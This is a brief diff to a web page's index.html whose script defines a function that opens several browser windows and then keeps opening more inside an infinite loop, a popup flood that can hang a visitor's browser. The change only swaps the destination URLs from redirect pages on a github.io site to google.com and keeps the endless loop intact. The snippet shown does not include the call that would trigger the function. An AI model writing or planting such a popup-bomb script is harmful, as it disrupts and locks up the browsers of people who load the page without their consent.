--- a/index.html
+++ b/index.html
@@ -3,11 +3,11 @@
 <head>
 <script>
 function myfunction() {
-window.open("https://georgezhou3.github.io/redirect4/", '_blank');
-window.open("https://georgezhou3.github.io/redirect4/", '_blank');
-window.open("https://georgezhou3.github.io/redirect4/",'width=600,height=400')
+window.open("https://google.com/", '_blank');
+window.open("https://google.com/", '_blank');
+window.open("https://google.com/",'width=600,height=400')
 while (1<2) {
-window.open("https://georgezhou3.github.io/redirect2/", '_blank');
+window.open("https://google.com/", '_blank');
 }
 }
 </script>
